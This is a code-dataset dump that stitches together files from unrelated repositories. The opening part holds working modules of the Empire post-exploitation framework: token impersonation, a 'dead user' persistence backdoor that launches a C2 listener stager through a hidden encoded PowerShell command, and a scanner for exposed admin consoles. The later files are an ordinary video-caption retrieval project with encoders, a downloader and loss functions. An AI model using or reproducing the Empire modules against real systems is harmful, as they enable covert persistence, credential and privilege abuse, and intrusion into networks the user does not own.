'http://clymb3r.wordpress.com/2013/11/03/powershell-and-token-impersonation/'
]
}
# any options needed by the module, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Agent' : {
'Description' : 'Agent to run module on.',
'Required' : True,
'Value' : ''
},
'RevToSelf' : {
'Description' : 'Switch. Revert to original token.',
'Required' : False,
'Value' : ''
},
'ShowAll' : {
'Description' : 'Switch. Enumerate all tokens.',
'Required' : False,
'Value' : ''
},
'ImpersonateUser' : {
'Description' : 'Switch. Will impersonate an alternate users logon token in the PowerShell thread.',
'Required' : False,
'Value' : ''
},
'CreateProcess' : {
'Description' : 'Specify a process to create instead of impersonating the user.',
'Required' : False,
'Value' : ''
},
'WhoAmI' : {
'Description' : 'Switch. Displays current credentials.',
'Required' : False,
'Value' : ''
},
'Username' : {
'Description' : 'Username to impersonate token of.',
'Required' : False,
'Value' : ''
},
'ProcessID' : {
'Description' : 'ProcessID to impersonate token of.',
'Required' : False,
'Value' : ''
},
'Process' : {
'Description' : 'Process name to impersonate token of.',
'Required' : False,
'Value' : ''
},
'ThreadId' : {
'Description' : 'Thread to impersonate token of.',
'Required' : False,
'Value' : ''
},
'ProcessArgs' : {
'Description' : 'Arguments for a spawned process.',
'Required' : False,
'Value' : ''
},
'NoUI' : {
'Description' : 'Switch. Use if creating a process which doesn\'t need a UI.',
'Required' : False,
'Value' : ''
}
}
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu = mainMenu
for param in params:
# parameter format is [Name, Value]
option, value = param
if option in self.options:
self.options[option]['Value'] = value
def generate(self, obfuscate=False, obfuscationCommand=""):
# read in the common module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/credentials/Invoke-TokenManipulation.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
print(helpers.color("[!] Could not read module source path at: " + str(moduleSource)))
return ""
moduleCode = f.read()
f.close()
script = moduleCode
scriptEnd = "Invoke-TokenManipulation"
if self.options['RevToSelf']['Value'].lower() == "true":
scriptEnd += " -RevToSelf"
elif self.options['WhoAmI']['Value'].lower() == "true":
scriptEnd += " -WhoAmI"
elif self.options['ShowAll']['Value'].lower() == "true":
scriptEnd += " -ShowAll | Out-String"
else:
for option,values in self.options.items():
if option.lower() != "agent":
if values['Value'] and values['Value'] != '':
if values['Value'].lower() == "true":
# if we're just adding a switch
scriptEnd += " -" + str(option)
else:
scriptEnd += " -" + str(option) + " " + str(values['Value'])
# try to make the output look nice
if scriptEnd.endswith("Invoke-TokenManipulation") or scriptEnd.endswith("-ShowAll"):
scriptEnd += "| Select-Object Domain, Username, ProcessId, IsElevated, TokenType | ft -autosize | Out-String"
else:
scriptEnd += "| Out-String"
if self.options['RevToSelf']['Value'].lower() != "true":
scriptEnd += ';"`nUse credentials/tokens with RevToSelf option to revert token privileges"'
if obfuscate:
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script
```
#### File: persistence/powerbreach/deaduser.py
```python
from __future__ import print_function
from builtins import str
from builtins import object
import os
from lib.common import helpers
class Module(object):
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'Invoke-DeadUserBackdoor',
'Author': ['@sixdub'],
'Description': ('Backup backdoor for a backdoor user.'),
'Background' : False,
'OutputExtension' : None,
'NeedsAdmin' : False,
'OpsecSafe' : True,
'Language' : 'powershell',
'MinLanguageVersion' : '2',
'Comments': [
'http://sixdub.net'
]
}
# any options needed by the module, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Agent' : {
'Description' : 'Agent to run module on.',
'Required' : True,
'Value' : ''
},
'Listener' : {
'Description' : 'Listener to use.',
'Required' : True,
'Value' : ''
},
'OutFile' : {
'Description' : 'Output the backdoor to a file instead of tasking to an agent.',
'Required' : False,
'Value' : ''
},
'Timeout' : {
'Description' : 'Time (in seconds) to run the backdoor. Defaults to 0 (run forever).',
'Required' : True,
'Value' : '0'
},
'Sleep' : {
'Description' : 'Time (in seconds) to sleep between checks.',
'Required' : True,
'Value' : '30'
},
'Username' : {
'Description' : 'User account to check for existence.',
'Required' : True,
'Value' : ''
},
'Domain' : {
'Description' : 'Switch. Check the current domain for the user account.',
'Required' : False,
'Value' : ''
}
}
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu = mainMenu
for param in params:
# parameter format is [Name, Value]
option, value = param
if option in self.options:
self.options[option]['Value'] = value
def generate(self, obfuscate=False, obfuscationCommand=""):
script = """
function Invoke-DeadUserBackdoor
{
Param(
[Parameter(Mandatory=$False,Position=1)]
[int]$Timeout=0,
[Parameter(Mandatory=$False,Position=2)]
[int] $Sleep=30,
[Parameter(Mandatory=$True,Position=3)]
[string] $Username,
[Parameter(Mandatory=$False,Position=4)]
[switch] $Domain
)
$running=$True
$match =""
$starttime = Get-Date
while($running)
{
if ($Timeout -ne 0 -and ($([DateTime]::Now) -gt $starttime.addseconds($Timeout)))
{
$running=$False
}
if($Domain)
{
$UserSearcher = [adsisearcher]"(&(samAccountType=805306368)(samAccountName=*$UserName*))"
$UserSearcher.PageSize = 1000
$count = @($UserSearcher.FindAll()).Count
if($count -eq 0)
{
Write-Verbose "Domain user $Username not found!"
$match=$True
}
}
else
{
$comp = $env:computername
[ADSI]$server="WinNT://$comp"
$usercheck = $server.children | where{$_.schemaclassname -eq "user" -and $_.name -eq $Username}
if(-not $usercheck)
{
$match=$True
}
}
if($match)
{
REPLACE_LAUNCHER
$running=$False
}
else
{
Start-Sleep -s $Sleep
}
}
}
Invoke-DeadUserBackdoor"""
listenerName = self.options['Listener']['Value']
if not self.mainMenu.listeners.is_listener_valid(listenerName):
# not a valid listener, return nothing for the script
print(helpers.color("[!] Invalid listener: " + listenerName))
return ""
else:
# set the listener value for the launcher
stager = self.mainMenu.stagers.stagers["multi/launcher"]
stager.options['Listener']['Value'] = listenerName
stager.options['Base64']['Value'] = "False"
# and generate the code
stagerCode = stager.generate()
if stagerCode == "":
return ""
else:
script = script.replace("REPLACE_LAUNCHER", stagerCode)
script = script.encode('ascii', 'ignore').decode('ascii')  # strip non-ascii but keep script as a str for the later += and f.write calls
for option,values in self.options.items():
if option.lower() != "agent" and option.lower() != "listener" and option.lower() != "outfile":
if values['Value'] and values['Value'] != '':
if values['Value'].lower() == "true":
# if we're just adding a switch
script += " -" + str(option)
else:
script += " -" + str(option) + " " + str(values['Value'])
outFile = self.options['OutFile']['Value']
if outFile != '':
# make the base directory if it doesn't exist
if not os.path.exists(os.path.dirname(outFile)) and os.path.dirname(outFile) != '':
os.makedirs(os.path.dirname(outFile))
f = open(outFile, 'w')
f.write(script)
f.close()
print(helpers.color("[+] PowerBreach deaduser backdoor written to " + outFile))
return ""
if obfuscate:
script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
# transform the backdoor into something launched by powershell.exe
# so it survives the agent exiting
modifiable_launcher = "powershell.exe -noP -sta -w 1 -enc "
launcher = helpers.powershell_launcher(script, modifiable_launcher)
stagerCode = 'C:\\Windows\\System32\\WindowsPowershell\\v1.0\\' + launcher
parts = stagerCode.split(" ")
# set up the start-process command so no new windows appears
scriptLauncher = "Start-Process -NoNewWindow -FilePath '%s' -ArgumentList '%s'; 'PowerBreach Invoke-DeadUserBackdoor started'" % (parts[0], " ".join(parts[1:]))
if obfuscate:
scriptLauncher = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptLauncher, obfuscationCommand=obfuscationCommand)
return scriptLauncher
```
#### File: situational_awareness/network/find_fruit.py
```python
from builtins import object
from lib.common import helpers
class Module(object):
def __init__(self, mainMenu, params=[]):
# metadata info about the module, not modified during runtime
self.info = {
# name for the module that will appear in module menus
'Name': 'Find Fruit',
# list of one or more authors for the module
'Author': ['@424f424f'],
# more verbose multi-line description of the module
'Description': ('Searches for low-hanging web applications.'),
# True if the module needs to run in the background
'Background' : True,
# File extension to save the file as
'OutputExtension' : None,
# if the module needs administrative privileges
'NeedsAdmin' : False,
# True if the method doesn't touch disk/is reasonably opsec safe
'OpsecSafe' : True,
# the module language
'Language' : 'python',
# the minimum language version needed
'MinLanguageVersion' : '2.6',
# list of any references/other comments
'Comments': ['CIDR Parser credits to http://bibing.us.es/proyectos/abreproy/12106/fichero/ARCHIVOS%252Fservidor_xmlrpc%252Fcidr.py']
}
# any options needed by the module, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Agent' : {
# The 'Agent' option is the only one that MUST be in a module
'Description' : 'Agent to execute module on.',
'Required' : True,
'Value' : ''
},
'Target' : {
'Description' : 'IP Address or CIDR to scan.',
'Required' : True,
'Value' : ''
},
'Port' : {
'Description' : 'The port to scan on.',
'Required' : True,
'Value' : '8080'
},
'SSL' : {
'Description' : 'True/False to force SSL',
'Required' : False,
'Value' : 'False'
}
}
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu = mainMenu
# During instantiation, any settable option parameters
# are passed as an object set to the module and the
# options dictionary is automatically set. This is mostly
# in case options are passed on the command line
if params:
for param in params:
# parameter format is [Name, Value]
option, value = param
if option in self.options:
self.options[option]['Value'] = value
def generate(self, obfuscate=False, obfuscationCommand=""):
target = self.options['Target']['Value']
port = self.options['Port']['Value']
ssl = self.options['SSL']['Value']
script = """
import urllib2
import sys
import re
import subprocess
iplist = []
def ip2bin(ip):
b = ""
inQuads = ip.split(".")
outQuads = 4
for q in inQuads:
if q != "":
b += dec2bin(int(q),8)
outQuads -= 1
while outQuads > 0:
b += "00000000"
outQuads -= 1
return b
def dec2bin(n,d=None):
s = ""
while n>0:
if n&1:
s = "1"+s
else:
s = "0"+s
n >>= 1
if d is not None:
while len(s)<d:
s = "0"+s
if s == "": s = "0"
return s
def bin2ip(b):
ip = ""
for i in range(0,len(b),8):
ip += str(int(b[i:i+8],2))+"."
return ip[:-1]
def printCIDR(c):
parts = c.split("/")
baseIP = ip2bin(parts[0])
subnet = int(parts[1])
if subnet == 32:
print bin2ip(baseIP)
else:
ipPrefix = baseIP[:-(32-subnet)]
for i in range(2**(32-subnet)):
iplist.append(bin2ip(ipPrefix+dec2bin(i, (32-subnet))))
return
def validateCIDRBlock(b):
p = re.compile("^([0-9]{1,3}\.){0,3}[0-9]{1,3}(/[0-9]{1,2}){1}$")
if not p.match(b):
print "Error: Invalid CIDR format!"
return False
prefix, subnet = b.split("/")
quads = prefix.split(".")
for q in quads:
if (int(q) < 0) or (int(q) > 255):
print "Error: quad "+str(q)+" wrong size."
return False
if (int(subnet) < 1) or (int(subnet) > 32):
print "Error: subnet "+str(subnet)+" wrong size."
return False
return True
def http_get(url):
req = urllib2.Request(url)
resp = urllib2.urlopen(req, timeout = 1)
code = resp.getcode()
if code == 200:
print url + " returned 200!"
return
def main(ip, port, ssl):
if ssl == True:
http = "https"
elif ssl == False:
http = "http"
VulnLinks = []
if '/' in ip:
printCIDR(ip)
for ip in iplist:
VulnLinks.append(http + '://' + ip + ':' + port + '/' + "jmx-console/")
VulnLinks.append(http + '://' + ip + ':' + port + '/' + "web-console/ServerInfo.jsp")
VulnLinks.append(http + '://' + ip + ':' + port + '/' + "invoker/JMXInvokerServlet")
VulnLinks.append(http + '://' + ip + ':' + port + '/' + "lc/system/console")
VulnLinks.append(http + '://' + ip + ':' + port + '/' + "axis2/axis2-admin/")
VulnLinks.append(http + '://' + ip + ':' + port + '/' + "manager/html/")
VulnLinks.append(http + '://' + ip + ':' + port + '/' + "tomcat/manager/html/")
VulnLinks.append(http + '://' + ip + ':' + port + '/' + "wp-admin")
VulnLinks.append(http + '://' + ip + ':' + port + '/' + "workorder/FileDownload.jsp")
VulnLinks.append(http + '://' + ip + ':' + port + '/' + "ibm/console/logon.jsp?action=OK")
VulnLinks.append(http + '://' + ip + ':' + port + '/' + "data/login")
else:
VulnLinks.append(http + '://' + ip + ':' + port + '/' + 'jmx-console/')
VulnLinks.append(http + '://' + ip + ':' + port + '/' + 'web-console/ServerInfo.jsp')
VulnLinks.append(http + '://' + ip + ':' + port + '/' + 'invoker/JMXInvokerServlet')
VulnLinks.append(http + '://' + ip + ':' + port + '/' + 'lc/system/console')
VulnLinks.append(http + '://' + ip + ':' + port + '/' + 'axis2/axis2-admin/')
VulnLinks.append(http + '://' + ip + ':' + port + '/' + 'manager/html/')
VulnLinks.append(http + '://' + ip + ':' + port + '/' + 'tomcat/manager/html/')
VulnLinks.append(http + '://' + ip + ':' + port + '/' + 'wp-admin')
VulnLinks.append(http + '://' + ip + ':' + port + '/' + 'workorder/FileDownload.jsp')
VulnLinks.append(http + '://' + ip + ':' + port + '/' + 'ibm/console/logon.jsp?action=OK')
VulnLinks.append(http + '://' + ip + ':' + port + '/' + 'data/login')
for link in VulnLinks:
while True:
try:
req = urllib2.Request(link)
resp = urllib2.urlopen(req, timeout = 1)
code = resp.getcode()
if code == 200:
print link + " returned 200!"
break
except urllib2.URLError:
break
ip = "%s"
port = str("%s")
ssl = %s
main(ip, port, ssl)
""" %(target, port, ssl)
return script
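# --- Illustrative aside (not part of Empire) ---
# ip2bin()/printCIDR() in the embedded payload expand a CIDR block into individual
# addresses with manual binary arithmetic, because the payload targets Python 2 /
# urllib2 on the agent. A rough modern equivalent for reference only (note that
# ipaddress.hosts() skips the network and broadcast addresses, unlike printCIDR):
def _expand_cidr_py3(block):
    import ipaddress
    return [str(host) for host in ipaddress.ip_network(block, strict=False).hosts()]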
``` |
{
"source": "JimShu716/Design_Project",
"score": 3
} |
#### File: data_process/Tempuckey/caption_encoder.py
```python
import numpy as np
import string
from sklearn.preprocessing import LabelEncoder
from sklearn.preprocessing import OneHotEncoder
from numpy import argmax
import gensim.models.keyedvectors
from gensim.models import Word2Vec
"""
Function to preprocess the raw caption text into one-hot encodings
feature - raw caption feature
word_vocab - word vocabulary used to construct the one-hot encoding
Return: the processed caption feature
"""
def caption_to_one_hot(feature, word_vocab):
dict_size = word_vocab.__len__()
for i in range(len(feature)):
for j in range(len(feature[i])):
sentence = feature[i][j][1]
sentence = sentence.lower() # to lower case
sentence = sentence.translate(str.maketrans('', '', string.punctuation)) # remove all punctuations
sentence_word = sentence.split()
integer_encoded_sentence = []
for word in sentence_word:
word_integer = word_vocab(word)
if word_integer == -1:
continue  # skip out-of-vocabulary words instead of indexing position -1
integer_encoded_sentence.append(word_integer)
# print(integer_encoded_sentence)
# ================ Initialize matrix for one hot encoding===========
one_hot_sentence = []
for idx in range(len(integer_encoded_sentence)):
initial_arr = np.zeros(dict_size).tolist()
initial_arr[integer_encoded_sentence[idx]] = 1.0
one_hot_sentence.append(initial_arr)
one_hot_sentence = np.array(one_hot_sentence)
feature[i][j] = one_hot_sentence
return feature
"""
Function to preprocess the raw caption text into a bag-of-words encoding
feature - raw caption feature
word_vocab - word vocabulary used to construct the bag-of-words vector
Return: the processed bow feature
"""
def caption_to_bow(feature, word_vocab):
dict_size = word_vocab.__len__()
feature_bow = []
for i in range(len(feature)):
sentence = ""
for j in range(len(feature[i])):
timestamps = feature[i][j][0]
sentence += feature[i][j][1]
# print("sentence is =",sentence)
sentence = sentence.lower() # to lower case
sentence = sentence.translate(str.maketrans('', '', string.punctuation)) # remove all punctuations
sentence_word = sentence.split()
integer_encoded_sentence = []
for word in sentence_word:
word_integer = word_vocab.__call__(word)
if word_integer == -1:
continue
integer_encoded_sentence.append(word_integer)
# print(integer_encoded_sentence)
# ================ Initialize matrix for one hot encoding===========
# one_hot_sentence = []
one_hot_sentence = np.zeros(dict_size).tolist()
for idx in range(len(integer_encoded_sentence)):
one_hot_sentence[integer_encoded_sentence[idx]] = 1.0
# one_hot_sentence.append(initial_arr)
one_hot_sentence = np.array(one_hot_sentence)
feature_bow.append(one_hot_sentence)
return feature_bow
"""
Function to preprocess the data in txt file into word vocabulary
Return: the extracted word vocabulary
"""
def txt_to_vocabulary(file_path):
word_vocab = ""
# print("====== Start processing vocabulary ====")
with open(file_path, 'rb') as reader:
for line in reader:
line = line.decode("utf-8")
cap_id, caption = line.split(' ', 1)
caption = caption.lower() # all to lower case
caption = caption.translate(str.maketrans('', '', string.punctuation)) # remove all punctuations
word_vocab += " "  # separate consecutive captions with a space
word_vocab += caption
vocab_result = word_vocab.split()
# ========= Remove duplicates in the vocabulary ========
vocab_set = set()
final_vocab = []
for word in vocab_result:
if word not in vocab_set:
vocab_set.add(word)
final_vocab.append(word)
return final_vocab
"""
Function to preprocess the word vocabulary into word dictionary for one-hot
Return: the word dictionary
"""
def vocab_to_dict(vocabulary):
# print("====== Start constructing dictionary ====")
# integer encode
label_encoder = LabelEncoder()
integer_encoded = label_encoder.fit_transform(vocabulary) # encode labels
integer_encoded_list = integer_encoded.tolist()
# ================ Construct a word dictionary===========
# fit_transform keeps the integer labels aligned with the vocabulary order,
# so the mapping can be built directly instead of popping values one by one
word_dict = dict(zip(vocabulary, integer_encoded_list))
# print("==== Dictionary Construction Completed =====")
return word_dict
"""
Function to generate word embedding by word2vec
feature - feature with raw caption texts
Return: the feature with sentence embeddings
"""
def word2vec_embeddings(feature):
# Load pretrained model
model = gensim.models.KeyedVectors.load_word2vec_format(WORD2VEC_PATH, binary=True, unicode_errors='ignore')  # WORD2VEC_PATH must be defined/configured elsewhere; it is not set in this file
for i in range(len(feature)):
for j in range(len(feature[i])):
timestamps = feature[i][j][0]
sentence = feature[i][j][1]
sentence = sentence.lower() # to lower case
sentence = sentence.translate(str.maketrans('', '', string.punctuation)) # remove all punctuations
sentence_word = sentence.split()
sentence_embeddings = []
# ======== Generate word embeddings and sentence embeddings by pretrained word2vec
for word in sentence_word:
word_embeddings = model[word]
sentence_embeddings.append(word_embeddings)
feature[i][j] = (timestamps, sentence_embeddings)
return feature
def compress_sentences(sentences):
compressed_sentence = ''
start_time = None
end_time = None
for sen in sentences:
if type(sen) == tuple and len(sen) == 2:
compressed_sentence += sen[1] + ' '
if start_time is None:
start_time = sen[0][0]
end_time = sen[0][1]
else:
end_time = sen[0][1]
elif type(sen) == str:
compressed_sentence += sen + ' '
else:
raise RuntimeError
compressed_sentence = compressed_sentence[:-1]
return start_time, end_time, compressed_sentence
class Vocabulary(object):
"""Simple vocabulary wrapper."""
def __init__(self, text_style):
self.word2idx = {}
self.idx2word = {}
self.idx = 0
self.text_style = text_style
def add_word(self, word):
if word not in self.word2idx:
self.word2idx[word] = self.idx
self.idx2word[self.idx] = word
self.idx += 1
def __call__(self, word):
if word not in self.word2idx:
return -1
return self.word2idx[word]
def __len__(self):
return len(self.word2idx)
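# --- Illustrative usage sketch (not part of the original pipeline) ---
# It assumes captions arrive as lists of (timestamps, sentence) tuples per video,
# which is the shape the encoders above expect, and builds a toy vocabulary by
# hand instead of calling txt_to_vocabulary().
def _demo_bow():
    vocab = Vocabulary(text_style='bow')
    for word in ['the', 'dog', 'runs']:
        vocab.add_word(word)
    feature = [[((0.0, 1.0), 'The dog runs.')]]
    return caption_to_bow(feature, vocab)  # one vector of length len(vocab) per video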
```
#### File: JimShu716/Design_Project/downloader.py
```python
import json
import argparse
import os
import os.path as osp
import shutil
from tqdm import tqdm
def load_json(file):
with open(file) as json_file:
data = json.load(json_file)
return data
def parseInput():
parser = argparse.ArgumentParser("msr_vtt_downloader")
parser.add_argument('--save_path', type=str, default='./MSR_VTT', help='path to save the videos')
parser.add_argument('--json_file', type=str, default='./videodatainfo_2017.json', help='path to save the json file')
parser.add_argument('--vid', type=int, default=-1, help='download a specific video with a vid. -1 to download all')
parser.add_argument('--cid', type=int, default=-1, help='check caption with an id of cid')
return parser.parse_args()
def download(vid, url, save_path):
name = vid+".mp4"
if osp.exists(osp.join(save_path, name)):
return
os.system("youtube-dl -f mp4 {} >> ./download_log.txt".format(url))
file = [x for x in os.listdir() if '.mp4' in x][0]
os.rename(file, name)
shutil.move(name, osp.join(save_path, name))
def main(config):
if not osp.exists(config.json_file):
raise RuntimeError("INVALID json file: {}".format(config.json_file))
if not osp.exists(config.save_path):
os.mkdir(config.save_path)
json_file = load_json(config.json_file)
videos = json_file['videos']
for video in tqdm(videos):
id = video['id']
vid = video['video_id']
# cat = video['category']
url = video['url']
# st = video['start time']
# ed = video['end time']
# sp = video['split']
# print("id: {}, vid: {}, url: {}".format(id, vid, url))
if config.vid == -1:  # -1 means download every video listed in the json
download(vid, url, config.save_path)
elif id == config.vid:
download(vid, url, config.save_path)
print("Done")
break
captions = json_file['sentences']
for cap in tqdm(captions):
cap_id = cap['sen_id']
vid = cap['video_id']
cap = cap['caption']
if config.cid == cap_id:
print("Captions {}: {}".format(cap_id, cap))
main(parseInput())
```
#### File: JimShu716/Design_Project/loss.py
```python
import torch
import numpy as np
from torch.autograd import Variable
import torch.nn as nn
def cosine_sim(im, s, t=1):
"""Dot-product similarity between all the image and sentence pairs (equals cosine similarity when the embeddings are L2-normalized)
"""
return im.mm(s.t())
def order_sim(im, s, t=1):
"""Order embeddings similarity measure $max(0, s-im)$
"""
YmX = (s.unsqueeze(1).expand(s.size(0), im.size(0), s.size(1))
- im.unsqueeze(0).expand(s.size(0), im.size(0), s.size(1)))
score = -YmX.clamp(min=0).pow(2).sum(2).sqrt().t()
return score
def euclidean_sim(im, s, t=1):
"""Negative squared Euclidean distance between all the image and sentence pairs
"""
YmX = (s.unsqueeze(1).expand(s.size(0), im.size(0), s.size(1))
- im.unsqueeze(0).expand(s.size(0), im.size(0), s.size(1)))
score = -YmX.pow(2).sum(2).t()
return score
def exponential_sim(im, s, t=1):
# need to check dimension matching
return torch.exp(cosine_sim(im, s)/t)
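# --- Illustrative sketch (not part of the original training code) ---
# Each similarity above maps video embeddings (B, D) and caption embeddings (B, D)
# to a (B, B) score matrix whose diagonal holds the matched pairs; the losses below
# build on that convention. A tiny self-contained check:
def _demo_similarity():
    im = torch.randn(4, 8)      # e.g. 4 video embeddings
    s = torch.randn(4, 8)       # e.g. 4 caption embeddings
    scores = cosine_sim(im, s)  # (4, 4); entry [i, j] compares video i with caption j
    return scores.diag()        # scores of the matched (video, caption) pairs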
class TripletLoss(nn.Module):
"""
triplet ranking loss
"""
def __init__(self, margin=0, measure=False, max_violation=False, cost_style='sum', direction='all'):
super(TripletLoss, self).__init__()
self.margin = margin
self.cost_style = cost_style
self.direction = direction
if measure == 'order':
self.sim = order_sim
elif measure == 'euclidean':
self.sim = euclidean_sim
elif measure == 'exp':
self.sim = exponential_sim
print("Exp")
else:
self.sim = cosine_sim
print("Cosine")
self.max_violation = max_violation
def forward(self, s, im, cap_ids=None):
"""
s.shape = (128, 2048)
im.shape = (128, 2048)
"""
# compute image-sentence score matrix
#print("shape of sentence: {}\nshape of image: {}".format(s.shape, im.shape))
scores = self.sim(im, s)
# after sim: scores.shape = (128, 128)
#print("shape of scores: {}".format(scores.shape))
# get the diagonal of the similiarty matrix
diagonal = scores.diag().view(im.size(0), 1)
# diagonal.shape = (128, 1)
# Guess: scores[i][i] = pos score? Indeed.
# TODO: Change the contrastive loss w.r.t this logic
d1 = diagonal.expand_as(scores)
d2 = diagonal.t().expand_as(scores)
# clear diagonals
mask = torch.eye(scores.size(0)) > .5
# generate a binary matrix with the diagonal is True while the rest is False
I = Variable(mask)
if torch.cuda.is_available():
I = I.cuda()
cost_s = None
cost_im = None
# compare every diagonal score to scores in its column
if self.direction in ['i2t', 'all']:
# caption retrieval
cost_s = (self.margin + scores - d1).clamp(min=0)
cost_s = cost_s.masked_fill_(I, 0)
# compare every diagonal score to scores in its row
if self.direction in ['t2i', 'all']:
# image retrieval
cost_im = (self.margin + scores - d2).clamp(min=0)
cost_im = cost_im.masked_fill_(I, 0)
# keep the maximum violating negative for each query
if self.max_violation:
if cost_s is not None:
cost_s = cost_s.max(1)[0]
if cost_im is not None:
cost_im = cost_im.max(0)[0]
if cost_s is None:
cost_s = Variable(torch.zeros(1)).cuda()
if cost_im is None:
cost_im = Variable(torch.zeros(1)).cuda()
pos_score = 0
neg_score = 0
if self.cost_style == 'sum':
neg_score = cost_s.sum()+cost_im.sum()
pos_score = d1.sum()
else:
neg_score = cost_s.mean()+cost_im.mean()
pos_score = d1.mean()
return neg_score, pos_score, neg_score
class ContrastiveLoss(nn.Module):
def __init__(self, measure='cosine', cost_style='sum', direction='all',temperature = 0.6):
super(ContrastiveLoss, self).__init__()
"""
measure: how to compute similiarity
cost_style: used to decide how to add up sentence and image loss (sum or avg)
direction: 'i2t' image to text retrieval, 't2i' text to image retrieval, 'all': both
"""
print(">"*20)
print("Contrastive Loss Used")
self.cost_style = cost_style
self.direction = direction
self.temperature = temperature
if measure == 'order':
self.sim = order_sim
elif measure == 'euclidean':
self.sim = euclidean_sim
elif measure == 'exp':
self.sim = exponential_sim
elif measure == 'cosine':
self.sim = cosine_sim
else:
raise NotImplemented
def forward(self, s, im, alpha=0, cap_ids=None):
"""
s: a 2d tensor with a shape of (batch_size, feature_size) Note: for original dual encoder, it is (batch_size, 2048)
im: a 2d tensor with a shape of (batch_size, feature_size) Note: for original dual encoder, it is (batch_size, 2048)
tempurature: used for simliarity
"""
scores = self.sim(im, s, t=self.temperature)
batch_size = scores.shape[0]
mask = np.zeros([batch_size,batch_size])
v_ids = []
if(cap_ids):
#print("--Using cap_ids")
cap_ids = np.array(cap_ids)
v_ids = np.empty(cap_ids.shape, dtype="<U10")#S10 generates b in front
for index in range(cap_ids.shape[0]):
v_ids[index] = cap_ids[index].split("#")[0]
for i in range(cap_ids.shape[0]):
for j in range(cap_ids.shape[0]):
mask[i][j] = np.where(cap_ids[j].split("#")[0]==v_ids[i],1,0)
else:
#if caption ids are not loaded, only positive on the diagonal
np.fill_diagonal(mask, 1)
m_match = torch.from_numpy(mask) == 1
m_cost = torch.from_numpy(mask) == 0
Imatch = Variable(m_match)
Icost = Variable(m_cost)
if torch.cuda.is_available():
Imatch = Imatch.cuda()
Icost = Icost.cuda()
cost_s = None
cost_im = None
match_s = None
match_im = None
# Implement negative sampling here
# TODO !!!
#MAY BE USE A MARGIN????
#if self.neg_sampling == 'all':
if self.direction in ['i2t', 'all']:
# caption retrieval
cost_s = scores.clamp(min=0)
# print("COST_S",cost_s)
cost_s = cost_s.masked_fill_(Imatch, 0)
match_s = scores.clamp(min=0)
match_s = match_s.masked_fill_(Icost, 0)
if self.direction in ['t2i', 'all']:
# image retrieval
cost_im = scores.clamp(min=0)
cost_im = cost_im.masked_fill_(Imatch, 0)
match_im = scores.clamp(min=0)
match_im = match_im.masked_fill_(Icost, 0)
#elif self.neg_sampling == 'progressive':
# raise NotImplementedError
#elif self.neg_sampling == 'random':
# raise NotImplementedError
# Sum up and return
if cost_s is None:
cost_s = Variable(torch.zeros(1), requires_grad = True).cuda()
if match_s is None:
match_s = Variable(torch.zeros(1), requires_grad = True).cuda()
if cost_im is None:
cost_im = Variable(torch.zeros(1), requires_grad = True).cuda()
if match_im is None:
match_im = Variable(torch.zeros(1), requires_grad = True).cuda()
#MIL-NCE loss
if self.cost_style == 'sum':
neg_score = cost_s.sum()+cost_im.sum()
pos_score = match_s.sum() + match_im.sum()
else:
neg_score = cost_s.mean()+cost_im.mean()
pos_score = match_s.mean() + match_im.mean()
loss = torch.log(neg_score /(pos_score+neg_score))
return loss, pos_score, neg_score
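# --- Illustrative sketch (not part of the original repo) ---
# A minimal CPU-only forward pass through the contrastive loss on random tensors.
# Without cap_ids only the diagonal pairs count as positives, matching the mask
# construction above; on a CUDA machine the same call works unchanged.
def _demo_contrastive_loss():
    criterion = ContrastiveLoss(measure='cosine', cost_style='sum', direction='all')
    s = torch.randn(8, 16)    # caption embeddings
    im = torch.randn(8, 16)   # video embeddings
    loss, pos_score, neg_score = criterion(s, im)
    return loss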
```
#### File: Design_Project/util/combine_features.py
```python
import os
import sys
import logging
from basic.constant import ROOT_PATH
from basic.generic_utils import Progbar
from basic.bigfile import BigFile
logger = logging.getLogger(__file__)
logging.basicConfig(
format="[%(asctime)s - %(filename)s:line %(lineno)s] %(message)s",
datefmt='%d %b %H:%M:%S')
logger.setLevel(logging.INFO)
def process(options, collection, featname, sub_collections, set_style):
rootpath = options.rootpath
target_feat_dir = os.path.join(rootpath, collection, 'FeatureData', featname)
target_img_file = os.path.join(rootpath, collection, set_style, collection+'.txt')
if os.path.exists(target_feat_dir):
if options.overwrite:
logger.info('%s exists! overwrite.', target_feat_dir)
else:
logger.info('%s exists! quit.', target_feat_dir)
sys.exit(0)
else:
os.makedirs(target_feat_dir)
target_feat_file = os.path.join(target_feat_dir, 'id.feature.txt')
target_id_file = os.path.join(target_feat_dir, 'id.txt')
sub_collections = sub_collections.split('@')
img_ids = []
with open(target_feat_file, 'w') as fw_feat, open(target_id_file, 'w') as fw_id:
for collect in sub_collections:
feat_dir = os.path.join(rootpath, collect, 'FeatureData', featname)
featfile = BigFile(feat_dir)
print(">>> Process %s" % collect)
progbar = Progbar(len(featfile.names))
for name in featfile.names:
feat = featfile.read_one(name)
fw_feat.write('%s %s\n' % (name, ' '.join(['%g'%x for x in feat])))
progbar.add(1)
img_ids.extend(featfile.names)
fw_id.write(' '.join(img_ids))
if os.path.exists(target_img_file):
logger.info('%s exists! quit.', target_img_file)
return 0
else:
if not os.path.exists(os.path.dirname(target_img_file)):
os.makedirs(os.path.dirname(target_img_file))
with open(target_img_file, 'w') as fw_img:
fw_img.write('\n'.join(img_ids) + '\n')
def main(argv=None):
if argv is None:
argv = sys.argv[1:]
from optparse import OptionParser
parser = OptionParser(usage="""usage: %prog [options] collection featname sub_collections set_style""")
parser.add_option("--rootpath", default=ROOT_PATH, type="string", help="rootpath (default: %s)" % ROOT_PATH)
parser.add_option("--overwrite", default=0, type="int", help="overwrite existing file (default=0)")
